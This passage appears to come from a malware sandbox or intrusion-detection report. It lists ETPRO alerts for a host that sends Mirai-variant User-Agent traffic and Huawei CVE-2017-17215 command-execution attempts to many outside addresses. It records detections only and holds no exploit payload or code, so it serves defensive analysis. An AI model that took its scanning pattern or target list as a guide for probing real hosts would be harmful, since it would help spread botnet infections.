Source Port:	54074
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.120.132

Timestamp:	192.168.2.2395.163.120.13240652802839471 11/22/23-08:39:46.072343
SID:	2839471
Source Port:	40652
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.251.133

Timestamp:	192.168.2.2395.101.251.13336640802839471 11/22/23-08:39:57.908451
SID:	2839471
Source Port:	36640
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.63.44

Timestamp:	192.168.2.2395.101.63.4457826802839471 11/22/23-08:39:59.804522
SID:	2839471
Source Port:	57826
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.134.30

Timestamp:	192.168.2.2395.179.134.3043288802839471 11/22/23-08:38:45.346629
SID:	2839471
Source Port:	43288
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.59.48.164

Timestamp:	192.168.2.2395.59.48.16447432802839471 11/22/23-08:38:54.187643
SID:	2839471
Source Port:	47432
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.65.52.124

Timestamp:	192.168.2.2395.65.52.12444510802839471 11/22/23-08:38:08.662602
SID:	2839471
Source Port:	44510
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.19.175

Timestamp:	192.168.2.2395.101.19.17552006802839471 11/22/23-08:38:35.817035
SID:	2839471
Source Port:	52006
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.177.31

Timestamp:	192.168.2.2388.221.177.3158406802839471 11/22/23-08:39:09.872132
SID:	2839471
Source Port:	58406
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.137.103

Timestamp:	192.168.2.2388.221.137.10345418802839471 11/22/23-08:40:09.950231
SID:	2839471
Source Port:	45418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.46.50.151

Timestamp:	192.168.2.23112.46.50.15158890802839471 11/22/23-08:38:49.083361
SID:	2839471
Source Port:	58890
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.172.75

Timestamp:	192.168.2.23112.126.172.7545408802839471 11/22/23-08:38:16.035262
SID:	2839471
Source Port:	45408
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.83.109.244

Timestamp:	192.168.2.2395.83.109.24436238802839471 11/22/23-08:38:32.462169
SID:	2839471
Source Port:	36238
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.51.106

Timestamp:	192.168.2.2395.163.51.10641664802839471 11/22/23-08:38:26.684766
SID:	2839471
Source Port:	41664
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.175.62.205

Timestamp:	192.168.2.23112.175.62.20544668802839471 11/22/23-08:39:47.807549
SID:	2839471
Source Port:	44668
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.185.234

Timestamp:	192.168.2.2395.85.185.23446392802839471 11/22/23-08:39:58.122027
SID:	2839471
Source Port:	46392
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.59.211

Timestamp:	192.168.2.2395.100.59.21133654802839471 11/22/23-08:38:30.021454
SID:	2839471
Source Port:	33654
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.177.77

Timestamp:	192.168.2.23112.74.177.7733658802839471 11/22/23-08:38:11.401817
SID:	2839471
Source Port:	33658
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.34.113.183

Timestamp:	192.168.2.23112.34.113.18350564802839471 11/22/23-08:39:23.351224
SID:	2839471
Source Port:	50564
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.96.250

Timestamp:	192.168.2.2395.216.96.25041616802839471 11/22/23-08:37:53.338996
SID:	2839471
Source Port:	41616
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.175.196.211

Timestamp:	192.168.2.23112.175.196.21141722802839471 11/22/23-08:39:25.671508
SID:	2839471
Source Port:	41722
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.184.182

Timestamp:	192.168.2.2395.100.184.18252248802839471 11/22/23-08:40:18.403616
SID:	2839471
Source Port:	52248
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.230.31

Timestamp:	192.168.2.23112.126.230.3159976802839471 11/22/23-08:38:11.393985
SID:	2839471
Source Port:	59976
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.66.163

Timestamp:	192.168.2.2395.100.66.16360906802839471 11/22/23-08:38:32.414787
SID:	2839471
Source Port:	60906
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.183.54.17

Timestamp:	192.168.2.2395.183.54.1755486802839471 11/22/23-08:38:56.649101
SID:	2839471
Source Port:	55486
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.241.59

Timestamp:	192.168.2.2395.100.241.5937688802839471 11/22/23-08:38:35.620780
SID:	2839471
Source Port:	37688
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.217.85.78

Timestamp:	192.168.2.2388.217.85.7855388802839471 11/22/23-08:39:06.806153
SID:	2839471
Source Port:	55388
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.77.66

Timestamp:	192.168.2.2395.56.77.6656916802839471 11/22/23-08:38:32.495163
SID:	2839471
Source Port:	56916
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.150.241.148

Timestamp:	192.168.2.2388.150.241.14844606802839471 11/22/23-08:40:18.230585
SID:	2839471
Source Port:	44606
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.16.224.120

Timestamp:	192.168.2.23112.16.224.12052030802839471 11/22/23-08:39:12.500240
SID:	2839471
Source Port:	52030
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.171.17.75

Timestamp:	192.168.2.23112.171.17.7551406802839471 11/22/23-08:39:40.648799
SID:	2839471
Source Port:	51406
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.153.139.253

Timestamp:	192.168.2.2395.153.139.25337318802839471 11/22/23-08:40:25.568099
SID:	2839471
Source Port:	37318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.225.159

Timestamp:	192.168.2.2388.221.225.15957770802839471 11/22/23-08:38:32.852134
SID:	2839471
Source Port:	57770
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.249.124

Timestamp:	192.168.2.2395.101.249.12438914802839471 11/22/23-08:39:12.833749
SID:	2839471
Source Port:	38914
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.185.179.122

Timestamp:	192.168.2.23112.185.179.12252430802839471 11/22/23-08:39:01.734140
SID:	2839471
Source Port:	52430
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.214.140.123

Timestamp:	192.168.2.2388.214.140.12337768802839471 11/22/23-08:40:18.538619
SID:	2839471
Source Port:	37768
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.26.238.55

Timestamp:	192.168.2.23112.26.238.5538506802839471 11/22/23-08:38:01.647047
SID:	2839471
Source Port:	38506
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.255.41.17

Timestamp:	192.168.2.2388.255.41.1748840802839471 11/22/23-08:40:06.977799
SID:	2839471
Source Port:	48840
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.98.13

Timestamp:	192.168.2.2395.101.98.1335072802839471 11/22/23-08:40:04.698847
SID:	2839471
Source Port:	35072
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.75.245

Timestamp:	192.168.2.2341.239.75.24534908372152835222 11/22/23-08:39:28.883760
SID:	2835222
Source Port:	34908
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.160.238

Timestamp:	192.168.2.23112.74.160.23854630802839471 11/22/23-08:39:45.586334
SID:	2839471
Source Port:	54630
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.170.134

Timestamp:	192.168.2.2388.221.170.13458396802839471 11/22/23-08:39:48.014514
SID:	2839471
Source Port:	58396
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.130.254.15

Timestamp:	192.168.2.2395.130.254.1549734802839471 11/22/23-08:39:54.664720
SID:	2839471
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.16.229.39

Timestamp:	192.168.2.23112.16.229.3950954802839471 11/22/23-08:40:15.759922
SID:	2839471
Source Port:	50954
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.255.52.180

Timestamp:	192.168.2.2388.255.52.18036956802839471 11/22/23-08:38:50.284516
SID:	2839471
Source Port:	36956
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.1.76

Timestamp:	192.168.2.2395.101.1.7658872802839471 11/22/23-08:38:58.769211
SID:	2839471
Source Port:	58872
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.217.155.82

Timestamp:	192.168.2.23112.217.155.8251538802839471 11/22/23-08:39:39.354255
SID:	2839471
Source Port:	51538
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.246.80.209

Timestamp:	192.168.2.2395.246.80.20943790802839471 11/22/23-08:38:08.669109
SID:	2839471
Source Port:	43790
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.34.202.189

Timestamp:	192.168.2.2341.34.202.18946134372152835222 11/22/23-08:38:13.131600
SID:	2835222
Source Port:	46134
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.224.58.59

Timestamp:	192.168.2.2388.224.58.5943332802839471 11/22/23-08:38:32.735193
SID:	2839471
Source Port:	43332
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.28.221.212

Timestamp:	192.168.2.23112.28.221.21259218802839471 11/22/23-08:38:48.609657
SID:	2839471
Source Port:	59218
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.185.234

Timestamp:	192.168.2.2395.85.185.23446652802839471 11/22/23-08:40:05.270962
SID:	2839471
Source Port:	46652
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.16.119

Timestamp:	192.168.2.2395.56.16.11933560802839471 11/22/23-08:38:42.639472
SID:	2839471
Source Port:	33560
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.141.3

Timestamp:	192.168.2.2395.179.141.340736802839471 11/22/23-08:38:32.414156
SID:	2839471
Source Port:	40736
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.33.49.147

Timestamp:	192.168.2.2395.33.49.14734374802839471 11/22/23-08:38:35.834742
SID:	2839471
Source Port:	34374
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.142.73

Timestamp:	192.168.2.2395.100.142.7350046802839471 11/22/23-08:40:04.698948
SID:	2839471
Source Port:	50046
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.116.73

Timestamp:	192.168.2.2395.100.116.7335332802839471 11/22/23-08:38:00.057084
SID:	2839471
Source Port:	35332
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.223.165

Timestamp:	192.168.2.23112.126.223.16536602802839471 11/22/23-08:38:20.062657
SID:	2839471
Source Port:	36602
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.178.179

Timestamp:	192.168.2.2388.221.178.17954260802839471 11/22/23-08:39:14.666559
SID:	2839471
Source Port:	54260
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.239.72.250

Timestamp:	192.168.2.2341.239.72.25041458372152835222 11/22/23-08:39:02.196658
SID:	2835222
Source Port:	41458
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.239.18

Timestamp:	192.168.2.2388.99.239.1847008802839471 11/22/23-08:39:47.996303
SID:	2839471
Source Port:	47008
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.180.96

Timestamp:	192.168.2.2395.179.180.9648130802839471 11/22/23-08:38:42.735862
SID:	2839471
Source Port:	48130
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.113.24.157

Timestamp:	192.168.2.2388.113.24.15752526802839471 11/22/23-08:38:21.696320
SID:	2839471
Source Port:	52526
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.11.130

Timestamp:	192.168.2.2388.221.11.13060746802839471 11/22/23-08:39:32.813745
SID:	2839471
Source Port:	60746
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.29.195.43

Timestamp:	192.168.2.23112.29.195.4357014802839471 11/22/23-08:39:45.597439
SID:	2839471
Source Port:	57014
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.168.209.77

Timestamp:	192.168.2.2395.168.209.7748870802839471 11/22/23-08:38:08.637756
SID:	2839471
Source Port:	48870
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.34.118

Timestamp:	192.168.2.2395.100.34.11846994802839471 11/22/23-08:40:28.926790
SID:	2839471
Source Port:	46994
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.228.47

Timestamp:	192.168.2.2395.181.228.4735672802839471 11/22/23-08:38:58.229442
SID:	2839471
Source Port:	35672
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.85.64.141

Timestamp:	192.168.2.2388.85.64.14157204802839471 11/22/23-08:40:14.083509
SID:	2839471
Source Port:	57204
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.0.96.197

Timestamp:	192.168.2.23197.0.96.19741388372152835222 11/22/23-08:40:28.467238
SID:	2835222
Source Port:	41388
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.230.223.204

Timestamp:	192.168.2.2395.230.223.20439336802839471 11/22/23-08:39:59.837286
SID:	2839471
Source Port:	39336
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.171.176

Timestamp:	192.168.2.23112.125.171.17637140802839471 11/22/23-08:38:11.377537
SID:	2839471
Source Port:	37140
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.241.235

Timestamp:	192.168.2.2388.221.241.23536508802839471 11/22/23-08:38:03.697867
SID:	2839471
Source Port:	36508
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.207.31

Timestamp:	192.168.2.2395.100.207.3133586802839471 11/22/23-08:39:13.994518
SID:	2839471
Source Port:	33586
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.204.255.101

Timestamp:	192.168.2.2388.204.255.10151840802839471 11/22/23-08:38:26.546053
SID:	2839471
Source Port:	51840
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.240.209

Timestamp:	192.168.2.23112.126.240.20958622802839471 11/22/23-08:38:15.728901
SID:	2839471
Source Port:	58622
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.196.31.73

Timestamp:	192.168.2.23112.196.31.7359800802839471 11/22/23-08:39:01.480282
SID:	2839471
Source Port:	59800
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.56.98.195

Timestamp:	192.168.2.23197.56.98.19551374372152829579 11/22/23-08:38:35.550535
SID:	2829579
Source Port:	51374
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.98.55.2

Timestamp:	192.168.2.2395.98.55.243850802839471 11/22/23-08:39:49.886820
SID:	2839471
Source Port:	43850
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.16.247.130

Timestamp:	192.168.2.23112.16.247.13043826802839471 11/22/23-08:38:12.085098
SID:	2839471
Source Port:	43826
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.156.111.55

Timestamp:	192.168.2.2388.156.111.5546362802839471 11/22/23-08:38:53.498160
SID:	2839471
Source Port:	46362
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.187.162

Timestamp:	192.168.2.23112.125.187.16253684802839471 11/22/23-08:40:30.507238
SID:	2839471
Source Port:	53684
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.211.226.142

Timestamp:	192.168.2.2395.211.226.14233318802839471 11/22/23-08:39:54.848290
SID:	2839471
Source Port:	33318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.200.120

Timestamp:	192.168.2.2395.216.200.12050650802839471 11/22/23-08:39:58.102835
SID:	2839471
Source Port:	50650
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.127.58

Timestamp:	192.168.2.2388.99.127.5848550802839471 11/22/23-08:39:32.796794
SID:	2839471
Source Port:	48550
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.155.13

Timestamp:	192.168.2.2395.110.155.1341556802839471 11/22/23-08:39:54.934206
SID:	2839471
Source Port:	41556
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.57.70.253

Timestamp:	192.168.2.2395.57.70.25341702802839471 11/22/23-08:39:45.857496
SID:	2839471
Source Port:	41702
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.135.199.44

Timestamp:	192.168.2.23112.135.199.4434690802839471 11/22/23-08:38:20.165353
SID:	2839471
Source Port:	34690
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.125.218.14

Timestamp:	192.168.2.23112.125.218.1453734802839471 11/22/23-08:38:18.062883
SID:	2839471
Source Port:	53734
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.165.91.225

Timestamp:	192.168.2.23112.165.91.22554606802839471 11/22/23-08:39:16.528057
SID:	2839471
Source Port:	54606
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.28.230.13

Timestamp:	192.168.2.2395.28.230.1333104802839471 11/22/23-08:40:27.014146
SID:	2839471
Source Port:	33104
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.81.88.140

Timestamp:	192.168.2.2388.81.88.14058040802839471 11/22/23-08:40:01.855251
SID:	2839471
Source Port:	58040
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.126.228.248

Timestamp:	192.168.2.23112.126.228.24841274802839471 11/22/23-08:39:42.876549
SID:	2839471
Source Port:	41274
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.88.233.108

Timestamp:	192.168.2.2388.88.233.10835642802839471 11/22/23-08:39:36.812078
SID:	2839471
Source Port:	35642
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.132.243

Timestamp:	192.168.2.2395.110.132.24348460802839471 11/22/23-08:37:50.619830
SID:	2839471
Source Port:	48460
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.50.16

Timestamp:	192.168.2.2395.101.50.1638666802839471 11/22/23-08:39:23.581584
SID:	2839471
Source Port:	38666
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.234.98

Timestamp:	192.168.2.2395.100.234.9835880802839471 11/22/23-08:38:56.649256
SID:	2839471
Source Port:	35880
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.161.196.170

Timestamp:	192.168.2.2395.161.196.17035598802839471 11/22/23-08:37:53.143313
SID:	2839471
Source Port:	35598
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.150.46

Timestamp:	192.168.2.2395.100.150.4647912802839471 11/22/23-08:39:25.180254
SID:	2839471
Source Port:	47912
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.185.234

